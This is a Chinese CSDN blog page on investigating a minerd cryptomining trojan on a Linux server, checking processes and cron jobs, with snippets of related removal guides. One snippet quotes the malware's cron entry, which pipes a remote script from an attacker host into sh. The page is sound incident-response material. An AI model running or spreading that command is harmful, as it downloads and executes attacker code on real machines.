一次 minerd 肉鸡木马的排查思路

最新推荐文章于 2024-01-17 16:53:31 发布
最新推荐文章于 2024-01-17 16:53:31 发布
阅读量1k 收藏
点赞数
文章标签: linux 系统安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43770745/article/details/126581649
版权

一次 minerd 肉鸡木马的排查思路

在日常使用 Linux 系统服务器时,如果系统安全维护方面做的不够规范和严谨,很容易导致主机被黑客植入恶意木马病毒被当做肉鸡。以后就是一次肉鸡木马病毒的排查过程,有助于运维服务器时遇到此情况时进行针对性的排查和修复。

【问题现象】

Linux 主机 CPU 跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。

【问题原因】

这种状况在出现时通过 top 命令可以看到有一个 minerd 进程占用 CPU 较高。

img

经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的 PID 为 1170,根据进程 ID 查询一下产生进程的程序路径

执行 ll /proc/$PID/exe, 其中 $PID 为查询到的进程 ID

异常程序在 /opt 目录下

img

此程序一般是由计划任务产生的,Linux 系统中默认创建了计划任务后会在 /var/spool/cron 目录下创建对应用户的计划任务脚本,执行 ls /var/spool/cron 查询一下系统中是否有异常的计划任务脚本程序。

可以看到,在此目录下有 1 个 root 的计划任务脚本和一个异常的目录 crontabs(默认情况下不会有此目录,用户创建计划任务也不会产生此目录&#

最低0.47元/天 解锁文章
捞起月亮的渔民丁
关注
minerd肉鸡木马排查思路
银时经验积累
07-29 525
Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的PID为1170,根据进程ID查询一下产生进程的程序路径 执行ll /proc/PID/exe,其中PID/exe,其中PID/exe,其中PID为查询到的进程ID 异常程序在/opt目录下 此程序一
肉鸡类问题排查思路
weixin_30765319的博客
11-17 97
来源:http://help.aliyun.com/knowledge_detail.htm?spm=5176.788314863.3.5.P8ZLvE&knowledgeId=5980550&categoryId=8314863肉鸡检查和防护,提供一些思路与方法,供参考:账户方面:Windows: 检查服务器内是否有异常的账户,查看下服务器内是否有非系统和用户本身创建的账...
Linux主机肉鸡木马minerd导致CPU跑满
chepei9387的博客
06-22 162
摘要:Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 Linux主机肉鸡木马minerd...
一次服务器沦陷为肉鸡后的实战排查过程!
民工哥的博客
06-10 1719
点击上方“民工哥技术之路”选择“置顶或星标”每天10点为你分享不一样的干货1、从防火墙瘫痪说起今天还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏...
linux和windows木马排查思路
qq_40770143的博客
10-23 2377
一般常见的黑客入侵途径 1、主机远程连接端口暴露在互联网并存在弱口令,被黑客暴力破解后获取主机权限。 2、主机部署数据库后连接端口暴露互联网,数据库账号弱口令,被黑客入侵数据后提权获取主机权限。 3、部署业务存在应用漏洞,被黑客利用植入webshell,控制主机。 一、windows系统排查木马处理流程: 1、procexp.exe 开启virtual在线查杀,发现木马进程。 2、procexp....
一次入侵Linux服务器和删除木马程序的经历
01-10
晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有...
用python做一个木马_Python编写简易木马程序
weixin_34405261的博客
01-30 6340
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
挖矿肉鸡排查修复
奔跑吧笨笨的博客
08-13 1万+
昨晚,在可视化平台上,查看服务器监控情况,发现服务器CPU100%运行一天多了。因为是自己的测试服务器,拿来玩的,没有运行什么项目,所以,也没有经常看。发现100%,这是个问题啊,看来有事儿要做了! 排查步骤: 1. top 命令查看服务器运行情况 上图显示:qW3xT.2 进程CPU运行始终保持在98%以上,这个就是问题所在啊。kill 9392 杀死该进程...
minerd木马处理流程
王孙小蛮的自留地
07-27 929
首先说一句,这木马太恶心了,卧槽 首先在服务器发现minerd 程序ps -rf|grep minerd然后发现crontab 定时任务根据这个地址看看攻击脚本,我就不分析了,大致是获取系统权限等等首先删除生成的秘钥然后暂停定时任务暂停服务删除/opt/minerd 文件记住这里有个坑,此时已经暂停掉任务了但是那个进程还在,我特么就奇怪了,可能出现的原因是已经进入定时任务后,暂定这个服务但是任务还
Linux服务器中木马肉鸡)手工清除方法
wuyongde0922的专栏
05-24 4917
0,简单判断有无木马 有无下列文件 cat /etc/rc.d/init.d/selinux cat /etc/rc.d/init.d/DbSecuritySpt ls /usr/bin/bsd-port  ls /usr/bin/dpkgd 查看大小是否正常 ls -lh /bin/netstat ls -lh /bin/ps ls -lh
ps -ef|grep命令
最新发布
qq_42630678的博客
01-17 9288
符号是管道符号,表示psgrep同时执行,ps的输出作为grep的输入。a :显示终端上的所有进程,包括其他用户的进程。ps -ef|grep可以查看包含关键字的进程。u :以用户为主的格式来显示程序状况。x :显示所有程序,不以终端机来区分。UID:程序被该 UID 所拥有。r :只显示正在运行的进程。C :CPU使用的资源百分比。TTY :登入者的终端机位置。TIME:使用掉的CPU时间。PPID:上级父程序的ID。-e : 显示所有进程。PID:程序的 ID。CMD:所下达的指令。
ps top kill 进程信息
chenchw的博客
06-29 81
所谓进程就是当前正在执行的一个程序。 ps aux process status 查看进程的详细状况 加上x的一帮不会用,一般来说就会显示很多的。 top 动态显示运行中的进程并且排序。(按照CPU占用率和内存占用率)小写字母q退出。 kill [-9] 进程代号 指定代号的进程,-9表示强行终止。 9 10 ps默认只会显示当前用户通过终端启动的应用程序。 ps a ps u ps au ps aux 注:PID进程代号 ...
关于服务被挖矿程序minerd入侵解决方法
热门推荐
Hu_wen的专栏
07-14 5万+
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件 本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运维
Linux清除木马minerd
骆驼大笨笨
08-02 9941
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
一次Windows Server 2008 服务器被植入挖矿木马处理
a18218401470的博客
01-14 1998
概览 CentOS 6.5转Windows Server 2008 阿里云CES 运行环境:ASP.NET运行环境(2.0/3.5/4.0+MySql5.5) 部署情况:C#部署在IIS7.1上,Python服务部署在Apache2.4,SQL Server,MySql 部署方式:由于IIS与Apache均需要使用80端口,所...
一次被入侵和删除木马程序的经历(转)
极客海哥
11-21 3395
首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击
清除wnTKYg 这个挖矿工木马的过程讲述
u010789532的博客
04-23 9299
由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了。感慨一番,书归正传,下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率300%, 这个挖矿工木马的过程讲述" title="清除wnTKYg 这个挖矿工木马的过程讲述" style
木马通信机制:秘密操控与危害全解析
特洛伊木马,作为一种恶意软件,起源于古希腊神话中的故事,但现今主要用于远程控制和信息窃取。一旦被植入目标计算机,木马会悄无声息地运行,允许攻击者通过网络获取对受害系统的访问权限。它通常会监听特定端口,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值